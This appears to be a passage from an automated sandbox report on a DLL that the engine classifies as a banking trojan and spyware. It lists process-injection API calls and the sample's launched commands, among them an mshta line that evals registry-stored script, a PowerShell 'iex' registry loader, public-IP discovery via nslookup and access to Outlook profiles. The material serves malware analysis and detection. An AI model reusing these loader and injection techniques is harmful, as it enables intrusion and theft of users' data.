                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB969C memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,3_2_04BB969C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BADE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_04BADE77
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB0FA5 NtQueryInformationProcess,3_2_04BB0FA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA7FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_04BA7FDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB680B NtMapViewOfSection,3_2_04BB680B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA4173 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_04BA4173
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA92F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,3_2_04BA92F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB5AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,3_2_04BB5AED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBA21F GetProcAddress,NtCreateSection,memset,3_2_04BBA21F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA1305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,3_2_04BA1305
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB7419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,3_2_04BB7419
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB36C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,3_2_04BB36C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB6F70 NtQuerySystemInformation,RtlNtStatusToDosError,3_2_04BB6F70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BAD812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,3_2_04BAD812
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BAD00C memset,NtQueryInformationProcess,3_2_04BAD00C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA4851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_04BA4851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB9180 NtGetContextThread,RtlNtStatusToDosError,3_2_04BB9180
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBDBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_04BBDBCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A722EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04A722EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A78055 NtQueryVirtualMemory,5_2_04A78055
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092A8D4 NtWriteVirtualMemory,34_2_0092A8D4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092B92C NtReadVirtualMemory,34_2_0092B92C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093FAA8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,34_2_0093FAA8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009252DC NtMapViewOfSection,34_2_009252DC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00921A58 NtQueryInformationToken,NtQueryInformationToken,NtClose,34_2_00921A58
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00922B08 NtQueryInformationProcess,34_2_00922B08
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092A444 RtlAllocateHeap,NtQueryInformationProcess,34_2_0092A444
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00947DAC NtCreateSection,34_2_00947DAC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00940DE0 NtAllocateVirtualMemory,34_2_00940DE0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093179C NtSetContextThread,NtUnmapViewOfSection,NtClose,34_2_0093179C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0095F002 NtProtectVirtualMemory,NtProtectVirtualMemory,34_2_0095F002
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C2B08 NtQueryInformationProcess,45_2_000002D2D67C2B08
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C1A58 NtQueryInformationToken,NtQueryInformationToken,NtClose,45_2_000002D2D67C1A58
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67FF002 NtProtectVirtualMemory,NtProtectVirtualMemory,45_2_000002D2D67FF002
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00961305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,49_2_00961305
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,49_2_0096DE77
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00970FA5 NtQueryInformationProcess,49_2_00970FA5
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00967FDD memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,49_2_00967FDD
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096D812 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,49_2_0096D812
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096D00C memset,NtQueryInformationProcess,49_2_0096D00C
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00977419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,49_2_00977419
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00976F70 NtQuerySystemInformation,RtlNtStatusToDosError,49_2_00976F70
                      Source: aixojixg.dll.20.drStatic PE information: No import functions for PE file found
                      Source: keehvxm3.dll.24.drStatic PE information: No import functions for PE file found
                      Source: a52acufz.dll.19.drStatic PE information: No import functions for PE file found
                      Source: ddwuzigh.dll.23.drStatic PE information: No import functions for PE file found
                      Source: data.dllBinary or memory string: OriginalFilenameSoon.dll8 vs data.dll
                      Source: data.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211007
                      Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: data.dllVirustotal: Detection: 7%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\data.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Father
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,BonebeginJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,FatherJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,RatherdesignJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD11B8 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,0_2_00DD11B8
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                      Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{023FD26A-79F2-8479-1356-BDF8F7EA41AC}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{5E9A7C9C-253E-40D9-9F72-297443C66DE8}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{BA7B1CC8-D157-FCAE-2B8E-95F08FA29924}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{72D23258-290F-740E-43C6-6DE8275AF19C}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
                      Source: C:\Windows\SysWOW64\cmd.exeMutant created: \Sessions\1\BaseNamedObjects\{82342662-F969-048B-93D6-3D78776AC12C}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{82DD54AC-F9FE-041C-93D6-3D78776AC12C}
                      Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{AEF8588D-35E8-10DC-2FC2-3944D3167DB8}
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: data.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
